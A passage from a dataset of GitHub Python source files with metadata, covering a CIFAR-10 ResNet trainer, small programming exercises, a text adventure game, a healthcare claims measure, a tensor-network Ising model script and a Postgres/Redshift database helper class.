DataLoader(cifar_train, batch_size=batchSize, shuffle=True)\n\n cifar_test = datasets.CIFAR10('cifar', False, transform=transforms.Compose([\n transforms.Resize((32, 32)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ]), download=True)\n cifar_test = DataLoader(cifar_test, batch_size=batchSize, shuffle=True)\n\n # x,label=iter(cifar_train).next()\n x, label = iter(cifar_test).next()\n print(\"x: \", x.shape, \"label: \", label.shape) # x: torch.Size([128, 3, 32, 32]) label: torch.Size([128])\n\n # model\n model = ResNet18()\n # loss\n criteon = nn.CrossEntropyLoss()\n # optimizer\n optimizer = optim.Adam(model.parameters(), lr=1e-3)\n\n print(\"model des: \", model)\n\n for epoch in range(epochs):\n\n model.train()\n for batchIdx, (x, label) in enumerate(cifar_train):\n # x:[b,3,32,32] label:[b]\n # forward\n logits = model(x) # logits:[b,10]\n loss = criteon(logits, label)\n\n # backprop\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if batchIdx % 300 == 0:\n print(epoch, batchIdx,\"loss: \", loss.item())\n\n # test\n model.eval()\n with torch.no_grad():\n total_correct = 0\n total_num=0\n for x,label in cifar_test:\n logits=model(x) # logits:[b,10]\n pred=logits.argmax(dim=1) # pred:[b]\n # print(\"logits[0]\",logits[0])\n correct=torch.eq(pred,label).float().sum().item()\n total_correct+=correct\n total_num+=x.size(0)\n\n accuracy=total_correct/total_num\n print(epoch,\"acc:\",accuracy)\n\n\nif __name__ == '__main__':\n # blk = ResBlk(64,128,4)\n # tmp = torch.rand(2, 64, 32, 32)\n # out = blk(tmp)\n # print(out.shape) # torch.Size([2, 128, 8, 8])\n\n # x = torch.rand(2, 3, 32, 32)\n # model = ResNet18()\n # out = model(x)\n # print(out.shape) # torch.Size([2, 10])\n\n cl=RunResNet18()\n cl.run()","repo_name":"Jacquelin803/DL","sub_path":"PytrochDL/c10Ciifar/Resnet.py","file_name":"Resnet.py","file_ext":"py","file_size_in_byte":7540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"4563278985","text":"import math\ndef isPrime(n):\n if(n < 2): return False\n for i in range(2, int(math.sqrt(n)) + 1):\n if(n%i == 0): return False\n return True\nn = int(input())\na = [int(val) for val in input().split()]\nres = []\nfor val in a:\n if(isPrime(val) and (val not in res)):\n res.append(val)\nfor val in res:\n print(val, a.count(val))","repo_name":"naruto-2002/PYTHON","sub_path":"danh_sach/liet_ke_so_nguyen_to_trong_day.py","file_name":"liet_ke_so_nguyen_to_trong_day.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"4343457565","text":"import sys\nn = int(sys.stdin.readline())\n# 색상 지정\n# 1부터 다루기 위해서 지정한 것이다.\na = [[0, 0, 0]] + [list(map(int, sys.stdin.readline().split())) for _ in range(n)]\nd = [[0]*3 for _ in range(n+1)]\n\nans = 1000*1000 + 1\n# 1번째의 집의 색상을 미리 고정하기 \nfor k in range(3): \n for j in range(3):\n if j == k:\n d[1][j] = a[1][j]\n else:\n d[1][j] = 1000*1000 + 1\n \n for i in range(2 , n+1):\n d[i][0] = min(d[i-1][1], d[i-1][2]) + a[i][0]\n d[i][1] = min(d[i-1][0], d[i-1][2]) + a[i][1]\n d[i][2] = min(d[i-1][1], d[i-1][0]) + a[i][2]\n \n for j in range(3):\n if j == k:\n continue\n ans = min(ans, d[n][j])\n\nprint(ans)\n \n","repo_name":"kalelpark/Baekjoon-Programmers","sub_path":"다이나믹 프로그래밍/BOJ17404.py","file_name":"BOJ17404.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"20764156302","text":"# zombie_part3.py\n#----------------------------------------------------------\n# Part 3 refactors the place_monster() function and the \n# monster attribute variables into a create_monster() \n# function. It also creates the place_cheese() function and\n# the \"take\" command to pick up the cheese.\n#\n# We also debug some of our command processing in the game\n# loop.\n#----------------------------------------------------------#\n\n# import libraries\nimport os\nimport random\n\n# create map\n#\n# kitchen => dining room\n# dining room => kitchen, ballroom\n# ballroom => dining room\n#\n\n#------------------------------ FUNCTIONS ------------------------------#\n\n# room function (controls map and room details)\ndef room_details(current):\n if current == \"Kitchen\":\n print(\"Kitchen\")\n print(\"--------------------\")\n print(\"A dank and dirty room buzzing with flies.\")\n print(\"The dining room is east.\")\n\n elif current == \"Dining Room\":\n print(\"Dining Room\")\n print(\"--------------------\")\n print(\"A large room with ornate golden decorations on each wall.\")\n print(\"The kitchen is west.\")\n print(\"The ballroom is north.\")\n\n else:\n print(\"Ballroom\")\n print(\"--------------------\")\n print(\"A vast room with a shiny wooden floor. Huge candlesticks guard the entrance.\")\n print(\"The dining room is south.\")\n\n# move function (gives possible room directions)\ndef move(current, direction):\n if current == \"Kitchen\":\n if direction.lower() == \"east\":\n current = \"Dining Room\"\n\n elif current == \"Dining Room\":\n if direction.lower() == \"west\":\n current = \"Kitchen\"\n else:\n current = \"Ballroom\"\n\n else:\n if direction.lower() == \"south\":\n current = \"Dining Room\"\n\n return current\n\n# make zombie function (randomly located)\ndef create_zombie():\n rand_room = random.randint(1, 3)\n if rand_room == 1:\n room = \"Kitchen\"\n elif rand_room == 2:\n room = \"Dining Room\"\n elif rand_room == 3:\n room = \"Ballroom\"\n\n name = \"Larry\"\n description = \"A smelly zombie\"\n message = \"What's up, dude! I'm hungry, and I like brains.\"\n\n return room, name, description, message\n\ndef place_cheese():\n rand_cheese = random.randint(1, 3)\n if rand_cheese == 1:\n room = \"Kitchen\"\n elif rand_cheese == 2:\n room = \"Dining Room\"\n elif rand_cheese == 3:\n room = \"Ballroom\"\n\n return room\n\n#------------------------------ GAME ------------------------------#\n\n# clear screen and give directions\nos.system(\"clear\")\n\nprint(\"+-------------------+\".center(50))\nprint(\"| Zombie Room |\".center(50))\nprint(\"+-------------------+\".center(50))\n\n# game loop\n\ncurrent_room = \"Kitchen\"\nzombie_room, zombie_name, zombie_description, zombie_message = create_zombie()\ncheese_room = place_cheese()\nhave_cheese = False\n\ndead = False\n\nwhile dead == False:\n # print current room\n print(\"\\n\")\n room_details(current_room)\n # print zombie details\n if current_room == zombie_room:\n print()\n print(zombie_description, \"named\", zombie_name, \"is here! He looks like he has something to say.\")\n if current_room == cheese_room:\n print()\n print(\"A large, stinky chunk of cheese moulders in the corner.\")\n\n # prompt user for command\n command = input(\"> \")\n\n # evaluate and execute move command\n if command.lower() in [\"north\", \"south\", \"east\", \"west\"]:\n current_room = move(current_room, command)\n\n # talk to zombie - if there is one! \n elif command.lower() == \"talk\":\n if current_room == zombie_room:\n print(zombie_message)\n else:\n print(\"Um...There's no one else here.\")\n\n # put cheese in backpack\n elif command.lower() == \"take\":\n if current_room == cheese_room:\n have_cheese = True\n print(\"You put the cheese in your backpack. Now you can fight the zombie!\")\n else:\n print(\"There's nothing here to take!\")\n\n # warn user about invalid commands\n else:\n print(\"I don't know how to \" + command)\n print(\"\\n-----------------------------------\")\n\n\n\n","repo_name":"samkoe/utilities","sub_path":"zombie_room/zombie_part3.py","file_name":"zombie_part3.py","file_ext":"py","file_size_in_byte":4200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"72825012560","text":"\"\"\"Processes a provider's claims to assess whether they meet CT Scan criteria.\"\"\"\nfrom claims_to_quality.analyzer.calculation.qpp_measure import QPPMeasure\nfrom claims_to_quality.analyzer.processing import claim_filtering\nfrom claims_to_quality.lib.connectors import idr_queries\nfrom claims_to_quality.lib.helpers.decorators import override\nfrom claims_to_quality.lib.qpp_logging import logging_config\nfrom claims_to_quality.lib.teradata_methods import execute\n\nimport newrelic.agent\n\nlogger = logging_config.get_logger(__name__)\n\n\nclass CTScanMeasure(QPPMeasure):\n \"\"\"\n Represents measures 415 and 416.\n\n If a provider has submitted any G-codes relevant to the measure:\n 1. check to see if there is a claim which includes relevant diagnosis and encounter\n codes, as usual.\n 2. If there is, then check the IDR to see if the beneficiary received a CT scan on any of\n the same dates of service.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize CT Scan Measure instance.\"\"\"\n super(CTScanMeasure, self).__init__(*args, **kwargs)\n self.fields_to_group_by = ['bene_sk']\n\n self.procedure_codes = [\n procedure_code.code\n for eligibility_option in self.eligibility_options\n for procedure_code in eligibility_option.procedure_codes\n ]\n\n @newrelic.agent.function_trace(name='execute-ct-scan-measure', group='Task')\n @override\n def execute(self, claims):\n \"\"\"Execute CT Scan Measure calculation.\"\"\"\n return super(CTScanMeasure, self).execute(claims)\n\n def _filter_by_ct_scan(self, claims):\n \"\"\"\n Return a list of eligible claims based on measure criteria.\n\n For CT Scan best practice measures, this means instances for which CT scans were performed\n (perhaps by a different provider) on the same day.\n \"\"\"\n bene_date_set = {\n (claim.bene_sk, claim_line.clm_line_from_dt)\n for claim in claims\n for claim_line in claim.claim_lines\n if claim_line.clm_line_hcpcs_cd in self.procedure_codes\n }\n\n ct_scan_benes_and_dates = self._get_ct_scan_beneficiaries_and_dates(bene_date_set)\n\n return [\n claim for claim in claims\n if any(\n (\n (claim.bene_sk, claim_line.clm_line_from_dt) in ct_scan_benes_and_dates\n for claim_line in claim.claim_lines\n if claim_line.clm_line_hcpcs_cd in self.procedure_codes\n )\n )\n ]\n\n @override\n def filter_by_eligibility_criteria(self, claims):\n \"\"\"Return a list of eligible claims based on measure criteria.\"\"\"\n quality_codes = self.measure_definition.get_measure_quality_codes()\n\n if not claim_filtering.do_any_claims_have_quality_codes(\n claims_data=claims, quality_codes=quality_codes):\n return []\n\n prefilter_claims = super(CTScanMeasure, self).filter_by_eligibility_criteria(claims)\n return CTScanMeasure._filter_by_ct_scan(self, prefilter_claims)\n\n @newrelic.agent.function_trace(name='get-ct-scan-dates-by-beneficiary', group='Task')\n def _get_ct_scan_beneficiaries_and_dates(self, bene_date_set):\n \"\"\"Query the IDR for matching CT scans for the given beneficiaries on the given dates.\"\"\"\n if not bene_date_set:\n return {}\n\n logger.debug('Query IDR for CT scan dates.')\n\n ct_scan_query = idr_queries.get_ct_scan_query(bene_date_set=bene_date_set)\n rows = execute.execute(ct_scan_query)\n\n return {\n (row['bene_sk'], row['clm_line_from_dt']) for row in rows\n }\n","repo_name":"CMSgov/qpp-claims-to-quality-public","sub_path":"claims_to_quality/analyzer/calculation/ct_scan_measure.py","file_name":"ct_scan_measure.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"3"}
+{"seq_id":"30515449342","text":"import platform\n\nimport numpy as np\nimport pytest\nimport torch\nfrom mmcv.transforms import to_tensor\nfrom mmengine.structures import InstanceData\n\nfrom mmaction.registry import MODELS\nfrom mmaction.structures import ActionDataSample\nfrom mmaction.testing import get_localizer_cfg\nfrom mmaction.utils import register_all_modules\n\nregister_all_modules()\n\n\ndef get_localization_data_sample():\n gt_bbox = np.array([[0.1, 0.3], [0.375, 0.625]])\n data_sample = ActionDataSample()\n instance_data = InstanceData()\n instance_data['gt_bbox'] = to_tensor(gt_bbox)\n data_sample.gt_instances = instance_data\n data_sample.set_metainfo(\n dict(\n video_name='v_test',\n duration_second=100,\n duration_frame=960,\n feature_frame=960))\n return data_sample\n\n\n@pytest.mark.skipif(platform.system() == 'Windows', reason='Windows mem limit')\ndef test_tem():\n model_cfg = get_localizer_cfg(\n 'bsn/bsn_tem_1xb16-400x100-20e_activitynet-feature.py')\n\n localizer_tem = MODELS.build(model_cfg.model)\n raw_feature = torch.rand(8, 400, 100)\n # gt_bbox = torch.Tensor([[[1.0, 3.0], [3.0, 5.0]]] * 8)\n data_samples = [get_localization_data_sample()] * 8\n losses = localizer_tem(raw_feature, data_samples, mode='loss')\n assert isinstance(losses, dict)\n\n # Test forward predict\n with torch.no_grad():\n for one_raw_feature in raw_feature:\n one_raw_feature = one_raw_feature.reshape(1, 400, 100)\n data_samples = [get_localization_data_sample()]\n localizer_tem(one_raw_feature, data_samples, mode='predict')\n","repo_name":"open-mmlab/mmaction2","sub_path":"tests/models/localizers/test_tem.py","file_name":"test_tem.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":3560,"dataset":"github-code","pt":"3"}
+{"seq_id":"70213602002","text":"from collections import defaultdict\n\n\nwith open('input') as f:\n ns = list(map(int, f.read().split(',')))\n\n\ndef run(inp):\n p = defaultdict(int, enumerate(ns))\n i = 0\n base = 0\n while True:\n cmd = str(p[i]).zfill(5)\n opcode = int(cmd[3:])\n modes = {k: int(cmd[3 - k]) for k in (1, 2, 3)}\n addrs = {}\n for k in (1, 2, 3):\n try:\n if modes[k] == 0:\n addrs[k] = p[i+k]\n elif modes[k] == 1:\n addrs[k] = i+k\n elif modes[k] == 2:\n addrs[k] = p[i+k]+base\n except IndexError:\n pass\n if opcode == 1:\n p[addrs[3]] = p[addrs[1]] + p[addrs[2]]\n i += 4\n elif opcode == 2:\n p[addrs[3]] = p[addrs[1]] * p[addrs[2]]\n i += 4\n elif opcode == 3:\n p[addrs[1]] = inp\n i += 2\n elif opcode == 4:\n print(p[addrs[1]])\n i += 2\n elif opcode == 5:\n i = p[addrs[2]] if p[addrs[1]] != 0 else i + 3\n elif opcode == 6:\n i = p[addrs[2]] if p[addrs[1]] == 0 else i + 3\n elif opcode == 7:\n p[addrs[3]] = int(p[addrs[1]] < p[addrs[2]])\n i += 4\n elif opcode == 8:\n p[addrs[3]] = int(p[addrs[1]] == p[addrs[2]])\n i += 4\n elif opcode == 9:\n base += p[addrs[1]]\n i += 2\n elif opcode == 99:\n return\n\n\n# Part one\nrun(1)\n\n# Part two\nrun(2)\n","repo_name":"fuglede/adventofcode","sub_path":"2019/day09/solutions.py","file_name":"solutions.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"3"}
+{"seq_id":"10365342766","text":"import os\nimport stravalib\nimport datetime\nimport psycopg2 as psy\nimport pandas as pd\n\nfrom activity_dashboard.dash_apps.finished_apps import driver\nfrom scripts import postgres as db\nfrom scripts import helper\n\ndef account_totals(all_runs, athlete, unit):\n convert = {\n 'imperial': [(0.000621371, 'mi'),\n (3.28084, 'ft')],\n 'metric': [(.001, 'km'),\n (1, 'm')]\n }\n\n # Distance\n total_dist = all_runs['dist'].sum()\n dist = f'{\"{:,}\".format(int(total_dist * convert[unit][0][0] + 0.5))} {convert[unit][0][1]}'\n dist_fun = f'{round(total_dist/(40.075*10**6), 2)} times around the Earth!'\n\n # Time\n total_time = all_runs['time'].sum()\n time = helper.format_time(total_time)\n intervals = (\n ('weeks', 604800), # 60 * 60 * 24 * 7\n ('days', 86400), # 60 * 60 * 24\n ('hours', 3600), # 60 * 60\n ('minutes', 60),\n ('seconds', 1),\n )\n\n def display_time(seconds, granularity=5):\n result = []\n\n for name, count in intervals:\n value = seconds // count\n if value:\n seconds -= value * count\n if value == 1:\n name = name.rstrip('s')\n result.append(\"{} {}\".format(value, name))\n return ', '.join(result[:granularity])\n time_fun = display_time(total_time)\n\n # Elevation\n total_elev = all_runs['elev'].sum()\n elev = f'{\"{:,}\".format(int(total_elev * convert[unit][1][0] + 0.5))} {convert[unit][1][1]}'\n elev_fun = f'{round(total_elev/8848, 2)} ascents of Mt. Everest!'\n\n # Activity count\n count = '{:,}'.format(all_runs['activity_id'].count())\n\n res = {'dist': dist,\n 'dist_fun': dist_fun,\n 'time': time,\n 'time_fun': time_fun,\n 'elev': elev,\n 'elev_fun': elev_fun,\n 'count': count,\n }\n\n return res","repo_name":"mgoyanes/runcrunch","sub_path":"home/scripts/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"1511105382","text":"import pystache\nfrom covid19visuals import constants, templates\nimport importlib.resources as pkg_resources\n\n\ndef build_index_html(total_cases, total_cases_us, total_deaths, total_deaths_us):\n html = pkg_resources.read_text(templates, 'index.html')\n last_updated = f'{constants.NOW.replace(microsecond=0).strftime(\"%A, %d %B %Y, %H:%M %Z\")}'\n template_data = {\n 'total_cases': f'{total_cases:,}',\n 'total_cases_us': f'{total_cases_us:,}',\n 'total_deaths': f'{total_deaths:,}',\n 'total_deaths_us': f'{total_deaths_us:,}',\n 'last_updated': last_updated\n }\n rendered = pystache.render(html, template_data)\n with open('index.html', 'w') as f:\n f.write(rendered)\n print('Saved file: index.html')\n","repo_name":"ccampo133/covid19-visualizations","sub_path":"covid19visuals/templating.py","file_name":"templating.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"70858374481","text":"#!/usr/bin/env python3\n\nimport copy\nimport json\nimport glob\nimport os\nimport sys\n\ntry:\n\timport dxfgrabber\nexcept:\n\tprint('You need dxfgrabber')\n\tprint('sudo pip install dxfgrabber')\n\tsys.exit(1)\n\n\nbuildings = {}\n\nbuilding_template = {\n\t'name': '',\n\t'name_short': '',\n\t'gps_latitude': 0,\n\t'gps_longitude': 0,\n\t'width': 0,\n\t'height': 0,\n\t'floors': {}\n};\n\nfloor_template = {\n\t'name': '',\n\t'z':0,\n\t'rooms':[]\n}\n\ndxfs = glob.glob('../floorplan/*.dxf')\nfor dxf in dxfs:\n\tdirname = os.path.dirname(dxf)\n\tfilename = os.path.splitext(dxf)[0]\n\n\tbuilding_id,floorid = os.path.basename(filename).split('_')\n\n\t# Parse the .DXF\n\tdxfparsed = dxfgrabber.readfile(dxf)\n\n\t# Make sense of the rooms\n\tmin_global_x = 10000000.0\n\tmin_global_y = 10000000.0\n\tmax_global_x = -10000000.0\n\tmax_global_y = -10000000.0\n\n\trooms = []\n\n\twith open(filename + '_rooms.txt') as f:\n\t\troom_numbers = f.readlines()\n\n\tfor e in dxfparsed.entities:\n\t\tif type(e) == dxfgrabber.entities.Polyline:\n\t\t\troom = {'lower_left':[],\n\t\t\t 'vertices':[]}\n\n\t\t\tmin_x = 1000000.0\n\t\t\tmin_y = 1000000.0\n\n\n\t\t\tfor v in e.points():\n\t\t\t\tx = round(v[0]/1000.0, 4)\n\t\t\t\ty = round(v[1]/1000.0, 4)\n\t\t\t\troom['vertices'].append([x,y])\n\n\t\t\t\tif x < min_x:\n\t\t\t\t\tmin_x = x\n\t\t\t\tif y < min_y:\n\t\t\t\t\tmin_y = y\n\n\t\t\t\tif x < min_global_x:\n\t\t\t\t\tmin_global_x = x\n\t\t\t\tif y < min_global_y:\n\t\t\t\t\tmin_global_y = y\n\n\t\t\t\tif x > max_global_x:\n\t\t\t\t\tmax_global_x = x\n\t\t\t\tif y > max_global_y:\n\t\t\t\t\tmax_global_y = y\n\n\t\t\tfor v in room['vertices']:\n\t\t\t\tv[0] -= min_x\n\t\t\t\tv[1] -= min_y\n\n\t\t\troom['lower_left'] = [min_x, min_y]\n\n\t\t\trooms.append(room)\n\n\n\t# Check if this building exists (from parsing a different floor)\n\tif building_id not in buildings:\n\t\tbuildings[building_id] = copy.deepcopy(building_template)\n\n\t\t# Fill in info from .info file\n\t\twith open(dirname + '/' + building_id + '.info') as f:\n\t\t\tfor line in f:\n\t\t\t\tif len(line.strip()) == 0:\n\t\t\t\t\tcontinue\n\t\t\t\topts = line.split(':', 1)\n\t\t\t\tbuildings[building_id][opts[0].strip().lower()] = opts[1].strip()\n\n\t# Add the new floor\n\tbuildings[building_id]['floors'][floorid] = copy.deepcopy(floor_template)\n\tbuildings[building_id]['floors'][floorid]['z'] = (int(floorid)-1)*8\n\n\t# Check if we made the building bigger\n\twidth = max_global_x - min_global_x\n\theight = max_global_y - min_global_y\n\tif width > buildings[building_id]['width']:\n\t\tbuildings[building_id]['width'] = width\n\tif height > buildings[building_id]['height']:\n\t\tbuildings[building_id]['height'] = height\n\n\t# All all rooms\n\n\t# order by lowest y value, then use lowest x value to break any ties\n\tdef orderroom(r):\n\t\treturn r['lower_left'][1]*1000.0 + r['lower_left'][0]\n\n\tfor i,room in zip(range(len(rooms)), sorted(rooms, key=orderroom)):\n\t\toffset_x = room['lower_left'][0] - min_global_x\n\t\toffset_y = room['lower_left'][1] - min_global_y\n\n\t\tbuildings[building_id]['floors'][floorid]['rooms'].append({\n\t\t\t'name': room_numbers[i].strip(),\n\t\t\t'coordinates': room['vertices'],\n\t\t\t'offset': (offset_x, offset_y)\n\t\t})\n\n\nfor buildingid,building in buildings.items():\n\twith open('../web/' + buildingid + '.json', 'w') as f:\n\t\tf.write(json.dumps(building))\n\n","repo_name":"lab11/visualizations","sub_path":"3d_building/python/create_building_json.py","file_name":"create_building_json.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"6509033994","text":"import numpy as np\nimport time\nimport networkx\n\nfrom TNR.Models.isingModel import IsingModel2Ddisordered\nfrom TNR.Contractors.contractor import replicaContractor\nfrom TNR.Contractors.heuristics import loopHeuristic as heuristic\n\nfrom TNR.Actions.loop_svd_elim import loop_svd_single_elim_network as eliminateLoops\nfrom TNR.Actions.optimize_loop import loop_svd_optimize_network as optimize\nfrom TNR.Actions.basic_actions import merge_all_nodes\n\nfrom TNR.Utilities.logger import makeLogger\nfrom TNR import config\nlogger = makeLogger(__name__, config.levels['generic'])\n\n\ndef ising2DFreeEnergy(nX, nY, h, J, accuracy):\n n = IsingModel2Ddisordered(nX, nY, h, J, accuracy)\n\n # Merge all\n n = merge_all_nodes(n, False)\n\n # Eliminate loops\n c = replicaContractor(n, 5, 1e6)\n ind = 0\n nodes = list(n.nodes)\n for node in nodes:\n done = False\n while len(networkx.cycles.cycle_basis(node.tensor.network.toGraph())) > 0:\n ind = c.index_of_least_cost()\n next_info, replaced = c.perform_action(ind, eliminateLoops, node, False)\n\n n = c.replicas[ind].network\n\n arr, log_arr, bdict = n.array\n return (np.log(np.abs(arr)) + log_arr) / (nX * nY)\n\n\nh = 1\nJ = 1\naccuracy = 1e-6\nsize = [(2, 2), (2, 3), (2, 4), (3, 3), (2, 5), (3, 4), (4, 4), (3, 6), (4, 5), (3, 7), (3, 8), (5, 5), (3, 9),\n (4, 7), (5, 6), (4, 8), (5, 7), (6, 6), (6, 7), (7, 7), (7, 8), (8, 8), (8, 9)]\nres = []\n\nfor s in size:\n for _ in range(3):\n logger.info(\n 'Examining system of size ' +\n str(s) +\n ' and J = ' +\n str(J) +\n '.')\n start = time.clock()\n f = ising2DFreeEnergy(s[0], s[1], h, J, accuracy)\n end = time.clock()\n res.append((s[0] * s[1], f, end - start))\n\nres = np.array(res)\n\nprint(res)\n\nnp.savetxt('ising2D_disordered.dat', res)\n","repo_name":"adamjermyn/PyTNR","sub_path":"TNR/Examples/ising2DJ_loop_opt.py","file_name":"ising2DJ_loop_opt.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"}
+{"seq_id":"23984608234","text":"import datetime\nimport boto3\nimport os\nimport json\nimport re\nimport urllib.parse\nimport inspect\nfrom botocore.exceptions import ClientError\n\n\nclass RequiredTableNotUpdated(Exception):\n \"\"\" This is a custom exception to report back to the AWS Step Function that a required table does not exist or has not yet been updated with the current reference time. \"\"\"\n\n###################################################################################################################################################\n###################################################################################################################################################\nclass database: #TODO: Should we be creating a connection/engine upon initialization, or within each method like we are now?\n def __init__(self, db_type):\n self.type = db_type.upper()\n self._engine = None\n self._connection = None\n \n @property\n def engine(self):\n if not self._engine:\n self._engine = self.get_db_engine()\n return self._engine\n\n @property\n def connection(self):\n if not self._connection:\n self._connection = self.get_db_connection()\n return self._connection\n \n ###################################\n def get_db_credentials(self):\n db_host = os.environ[f'{self.type}_DB_HOST']\n db_name = os.environ[f'{self.type}_DB_DATABASE']\n db_user = os.environ[f'{self.type}_DB_USERNAME']\n db_password = os.getenv(f'{self.type}_DB_PASSWORD')\n return db_host, db_name, db_user, db_password\n\n ###################################\n def get_db_engine(self):\n from sqlalchemy import create_engine\n db_host, db_name, db_user, db_password = self.get_db_credentials()\n db_engine = create_engine(f'postgresql://{db_user}:{db_password}@{db_host}/{db_name}')\n print(f\"***> Established db engine to: {db_host} from {inspect.stack()[1].function}()\")\n return db_engine\n\n ###################################\n def get_db_connection(self, asynchronous=False):\n import psycopg2\n db_host, db_name, db_user, db_password = self.get_db_credentials()\n port = 5439 if self.type == \"REDSHIFT\" else 5432\n connection = psycopg2.connect(f\"host={db_host} dbname={db_name} user={db_user} password={db_password} port={port}\", async_=asynchronous)\n print(f\"***> Established db connection to: {db_host} from {inspect.stack()[1].function}()\")\n return connection\n\n ###################################\n def get_db_values(self, table, columns):\n import pandas as pd\n db_engine = self.engine\n if not type(columns) == list:\n raise Exception(\"columns argument must be a list of column names\")\n columns = \",\".join(columns)\n print(f\"---> Retrieving values for {columns}\")\n df = pd.read_sql(f'SELECT {columns} FROM {table}', db_engine)\n db_engine.dispose()\n return df\n \n ###################################\n def load_df_into_db(self, table_name, df, drop_first=True):\n import pandas as pd\n schema = table_name.split(\".\")[0]\n table = table_name.split(\".\")[-1]\n db_engine = self.engine\n if drop_first:\n print(f\"---> Dropping {table_name} if it exists\")\n db_engine.execute(f'DROP TABLE IF EXISTS {table_name};') # Drop the stage table if it exists\n print(\"---> Getting sql to create table\")\n create_table_statement = pd.io.sql.get_schema(df, table_name)\n replace_values = {'\"geom\" TEXT': '\"geom\" GEOMETRY', \"REAL\": \"DOUBLE PRECISION\"} # Correct data types\n for a, b in replace_values.items():\n create_table_statement = create_table_statement.replace(a, b)\n create_table_statement = create_table_statement.replace(f'\"{table_name}\"', table_name)\n print(f\"---> Creating {table_name}\")\n db_engine.execute(create_table_statement) # Create the new empty stage table\n print(f\"---> Adding data to {table_name}\")\n df.to_sql(con=db_engine, schema=schema, name=table, index=False, if_exists='append')\n db_engine.dispose()\n\n ###################################\n def run_sql_file_in_db(self, sql_file):\n sql = open(sql_file, 'r').read()\n with self.connection as db_connection:\n try:\n cur = db_connection.cursor()\n print(f\"---> Running {sql_file}\")\n cur.execute(sql)\n db_connection.commit()\n except Exception as e:\n raise e\n \n ################################### \n def run_sql_in_db(self, sql, return_geodataframe=False):\n if sql.endswith(\".sql\"):\n sql = open(sql, 'r').read()\n \n db_engine = self.engine\n if not return_geodataframe:\n import pandas as pd\n df = pd.read_sql(sql, db_engine)\n else:\n import geopandas as gdp\n df = gdp.GeoDataFrame.from_postgis(sql, db_engine)\n \n db_engine.dispose()\n return df\n\n ###################################\n def get_est_row_count_in_table(self, table):\n print(f\"Getting estimated total rows in {table}.\")\n with self.connection as db_connection:\n try:\n cur = db_connection.cursor()\n sql = f\"\"\"\n SELECT (CASE WHEN c.reltuples < 0 THEN NULL -- never vacuumed\n WHEN c.relpages = 0 THEN float8 '0' -- empty table\n ELSE c.reltuples / c.relpages END\n * (pg_catalog.pg_relation_size(c.oid) / pg_catalog.current_setting('block_size')::int))::bigint\n FROM pg_catalog.pg_class c\n WHERE c.oid = '{table}'::regclass; -- schema-qualified table here\n \"\"\"\n cur.execute(sql)\n rows = cur.fetchone()[0]\n except Exception as e:\n raise e\n return rows\n \n ###################################\n def move_data_to_another_db(self, dest_db_type, origin_table, dest_table, stage=True, add_oid=True, add_geom_index=True, chunk_size=200000):\n import pandas as pd\n origin_engine = self.engine\n dest_db = self.__class__(dest_db_type)\n dest_engine = dest_db.get_db_engine()\n if stage:\n dest_final_table = dest_table\n dest_final_table_name = dest_final_table.split(\".\")[1]\n dest_table = f\"{dest_table}_stage\"\n total_rows = self.get_est_row_count_in_table(origin_table) + 50000 #adding 50000 for buffer since this is estimated\n print(f\"---> Reading {origin_table} from the {self.type} db\")\n dest_engine.execute(f'DROP TABLE IF EXISTS {dest_table};') # Drop the destination table if it exists\n \n # Chunk the copy into multiple parts if necessary\n for x in range(0, total_rows, chunk_size):\n print(f\"Copying Chunk: LIMIT {chunk_size} OFFSET {x}\")\n df = pd.read_sql(f'SELECT * FROM {origin_table} LIMIT {chunk_size} OFFSET {x};', origin_engine) # Read from the newly created table\n drop_first = True if x == 0 else False\n dest_db.load_df_into_db(dest_table, df, drop_first=drop_first)\n \n if add_oid:\n print(f\"---> Adding an OID to the {dest_table}\")\n dest_engine.execute(f'ALTER TABLE {dest_table} ADD COLUMN OID SERIAL PRIMARY KEY;')\n if add_geom_index:\n print(f\"---> Adding an spatial index to the {dest_table}\")\n dest_engine.execute(f'CREATE INDEX ON {dest_table} USING GIST (geom);') # Add a spatial index\n if stage:\n print(f\"---> Renaming {dest_table} to {dest_final_table}\")\n dest_engine.execute(f'DROP TABLE IF EXISTS {dest_final_table};') # Drop the published table if it exists\n dest_engine.execute(f'ALTER TABLE {dest_table} RENAME TO {dest_final_table_name};') # Rename the staged table\n origin_engine.dispose()\n dest_engine.dispose()\n \n ###################################\n def cache_data(self, table, reference_time, retention_days=30):\n retention_cutoff = reference_time - datetime.timedelta(retention_days)\n ref_prefix = f\"ref_{reference_time.strftime('%Y%m%d_%H%M_')}\"\n retention_prefix = f\"ref_{retention_cutoff.strftime('%Y%m%d_%H%M_')}\"\n new_archive_table = f\"archive.{ref_prefix}{table}\"\n cutoff_archive_table = f\"archive.{retention_prefix}{table}\"\n db_engine = self.engine\n db_engine.execute(f'DROP TABLE IF EXISTS {new_archive_table};')\n db_engine.execute(f'DROP TABLE IF EXISTS {cutoff_archive_table};')\n db_engine.execute(f'SELECT * INTO {new_archive_table} FROM publish.{table};')\n db_engine.dispose()\n print(f\"---> 